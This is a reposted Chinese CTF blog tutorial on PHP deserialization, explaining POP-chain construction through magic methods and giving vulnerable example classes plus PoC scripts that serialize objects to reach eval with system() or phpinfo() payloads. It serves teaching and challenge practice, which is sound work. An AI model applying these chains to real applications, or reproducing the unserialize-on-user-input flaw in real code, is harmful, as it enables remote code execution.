【web]-php反序列化-复杂1（转）

少多慢快

于 2024-07-18 09:33:58 发布

阅读量588

点赞数 16

分类专栏： ctf 文章标签： php 序列化

本文链接：https://blog.csdn.net/mails2008/article/details/140511901

版权

ctf 专栏收录该内容

26 篇文章 0 订阅

订阅专栏

转自： PHP反序列化-CSDN博客

反序列化漏洞是基于序列化和反序列化的操作，在反序列化——unserialize()时存在用户可控参数，而反序列化会自动调用一些魔术方法，如果魔术方法内存在一些敏感操作例如eval()函数，而且参数是通过反序列化产生的，那么用户就可以通过改变参数来执行敏感操作，这就是反序列化漏洞。

方法论：起点（魔法函数）,终点（执行、危险函数），跳板

1、反序列化的常见起点：

（1）__wakeup 一定会调用

（2）__destruct 一定会调用

（3）__toString 当一个对象被反序列化后又被当做字符串使用
2、反序列化的常见中间跳板:

（1）__toString 当一个对象被当做字符串使用

（2）__get 读取不可访问或不存在属性时被调用

（3）__set 当给不可访问或不存在属性赋值时被调用

（4）__isset 对不可访问或不存在的属性调用isset()或empty()时被调用，形如 t h i s − > this-> this−>func();

（5）__call 调用不可访问或不存在的方法时被调用
3、反序列化的常见终点:

（1）call_user_func 一般php代码执行都会选择这里

（2）call_user_func_array 一般php代码执行都会选择这里

（3）执行指令、文件操作、执行代码等敏感操作

<?php
class kaiser {
    var $a;
    function __construct() {
        $this->a = new Test();
    }
    function __destruct() {
        $this->a->hello();
    }
}
class Test {
    function hello() {
        echo "Hello World.";
    }
}
class Vul {
    var $data;
    function hello() {
        @eval($this->data);
    }
}

$k = new kaiser();
$v = new Vul();
$k->a = $v;
$v->data = 'system("type flag.txt");';

$c = serialize($k);
echo $c;
#如果使用private定义 poc则需要url编码
$d=urlencode($c);
unserialize($c);

?>

我的做题思路可能有问题，都是在源代码上修改，可以简化为：

class kaiser {
    private $a;
    function __construct() {
        $this->a = new Vul();
    }
}
class Vul {
    protected $data = "phpinfo();";
}

echo urlencode(serialize(new kaiser()));

//********************************************??????????????/

复杂一点的例子：

<?php
class Tiger{
    public $string;
    protected $var;
    public function __toString(){
        return $this->string;
    }
    public function boss($value){
        @eval($value);
    }
    public function __invoke(){
        $this->boss($this->var);
    }
}
class Lion{
    public $tail;
    public function __construct(){
        $this->tail = array();
    }
    public function __get($value){
        $function = $this->tail;
        return $function();
    }
}
class Monkey{
    public $head;
    public $hand;
    public function __construct($here="Zoo"){
        $this->head = $here;
        echo "Welcome to ".$this->head."<br>";
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->head)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}
class Elephant{
    public $nose;
    public $nice;
    public function __construct($nice="nice"){
        $this->nice = $nice;
        echo $nice;
    }
    public function __toString(){
        return $this->nice->nose;
    }
}
if(isset($_GET['zoo'])){
    @unserialize($_GET['zoo']);
}
else{
    $a = new Monkey;
    echo "Hello PHP!";
}
?>

POP调用链分析
1、确定终点

经过详细分析，目标调用存在于Tiger类的boss方法中，只要能够构造出boss方法的参数值为一条序列化字符串的PHP代码，即可完成。
2、寻找起点

通常反序列化过程中，必然会被自动调用的是__wakeup 和 __destruct 两个魔术方法，所以寻找上述代码中的起点，发现只有在Monkey类中存在__wakeup，那么就暂时先以Monkey类作为起点，进行反序列化操作，但是是否能达到终点并不完全确定，如果最终无法到达终点，那么我们就必须要继续寻找新的起点，或者是评估调用链是否正确。
3、确定$this->head

在Monkey类的__wakeup魔术方法中，使用了preg_match函数进行正则匹配，也就意味着第二个参数 $this->head 必须是一个字符串。从Monkey类中可以看到，$this->head的值可以来源于构造方法，默认值为 Zoo，但是这样使用显然不可能，因为反序列化的时候，是不会调用构造方法的。那么所以只能换一个方向来思考，$this->head如果是一个对象呢，当把一个对象当成字符串处理时，会触发__toString魔术方法，这条路也许可行。
4、确定__toString所在类

现在有两个对象有tostring方法，分别是Elephant和Tiger，选择哪个呢，我们的目的是进入boss函数执行命令，可以看到Tiger的tostring方法只是返回一个变量没啥用，所以就选择让$this->head = new Elephant();，此时会执行$this->nice->nose;
5、确定$this->nice

在Elephant的构造方法中，也存在对$nice的赋值，但是这类操作并没有实际价值，因为我们的目标是要想办法进行跳转，要一步一步跳转到别的类当中去执行代码，进而最终到达终点。目前还剩下Tiger的__invoke和Lion的__get没有进行跳转和调用，那么首先需要知道这两个魔术方法的触发条件：

（1）__invoke：当以函数方式调用对象时被调用，也就是类似：$a = new A(); $a();这种调用方式时触发

（2）__get：读取不可访问或不存在属性时被调用

那么我们来分析一下，$this->nice为哪个对象时，可以继续往下走。显然，此处不可能有条件能够触发到__invoke，那么只能选择触发__get，于是令$this->nice = new Lion()，而Lion类并没有属性nose，所以完成对Lion类的__get的触发
6、确定$this->tail

当跳转到Lion类的__get方法时，此时我们看到两个特征，第一：在返回一个函数，那么这很有可能为下一步准备以函数方式调用对象做了铺垫，即可以触发Tiger类的__invoke方法，目前看起来也许前面的POP正确性比较高。第二：需要确定$this->tail的值，那么按照这个设计来看的话，此处应该令$this->tail = new Tiger(); 是很有可能正确的。这个时候$function就是Tiger对象，而下一步的代码return $function();恰好可以印证这一点，实现了对象的函数式调用，进而触发Tiger类的__invoke魔术方法。
7、确定$this->var

进到Tiger类的__invoke魔术方法中时，直接看到了调用$this->boss()方法，已经快到终点了，所以此时，只需要确定$this->var的值便可以完成调用链的构造了，此时问题变简单了，只需要令$this->var = phpinfo();即可完成构造。
8、以终为始

上述分析过程，是以起点开始的，而往往起点通向终点的过程并不一定非常顺利，所以也可以将分析过程反过来，以终点开始，逐步推向起点，效率也许会更高。如果倒推，顺推都是一条路径，那么足以说明POP链是完全正确的。
——————

class Tiger{
    public $string;
    protected $var = "phpinfo();";
}


class Lion{
    public $tail;

    function __construct() {
        $this->tail = new Tiger();
    }
}

class Elephant {
    public $nose;
    public $nice;

    function __construct()
    {
        $this->nice = new Lion();
    }
}

class Monkey{
    public $head;

    function __construct()
    {
        $this->head = new Elephant();
    }
}

$m = new Monkey();
echo urlencode(serialize($m));

总结

（1）先要确定起点和终点，如果起点有多个，那么就去尝试最有可能进行相互跳转的一个，起点和终点无法确定，POP链不可能成功。

（2）一定要牢记不同的魔术方法的自动触发条件，如果不太熟悉，则做实验证明，然后理解它。

（3）自动触发的跳转过程，会不停地给类变量（属性）赋值，一定要知道该赋什么样的值，通常的值都不会是普通类型，而是对象。

（4）POP链的分析和构造过程，可以完全忽略非魔术方法或也链条无关的方法和属性。

（5）POP的核心在于属性，而不是方法，序列化和反序列化的核心也在属性，而不是方法，所以方法对我们构造POC是无意义的。总结

（1）先要确定起点和终点，如果起点有多个，那么就去尝试最有可能进行相互跳转的一个，起点和终点无法确定，POP链不可能成功。

（2）一定要牢记不同的魔术方法的自动触发条件，如果不太熟悉，则做实验证明，然后理解它。

（3）自动触发的跳转过程，会不停地给类变量（属性）赋值，一定要知道该赋什么样的值，通常的值都不会是普通类型，而是对象。

（4）POP链的分析和构造过程，可以完全忽略非魔术方法或也链条无关的方法和属性。

（5）POP的核心在于属性，而不是方法，序列化和反序列化的核心也在属性，而不是方法，所以方法对我们构造POC是无意义的。
————————————————

少多慢快

关注

16
点赞
踩
18

收藏

觉得还不错? 一键收藏
0
评论
【web]-php反序列化-复杂1（转）

从Monkey类中可以看到，$this->head的值可以来源于构造方法，默认值为 Zoo，但是这样使用显然不可能，因为反序列化的时候，是不会调用构造方法的。通常反序列化过程中，必然会被自动调用的是__wakeup 和 __destruct 两个魔术方法，所以寻找上述代码中的起点，发现只有在Monkey类中存在__wakeup，那么就暂时先以Monkey类作为起点，进行反序列化操作，但是是否能达到终点并不完全确定，如果最终无法到达终点，那么我们就必须要继续寻找新的起点，或者是评估调用链是否正确。
复制链接

扫一扫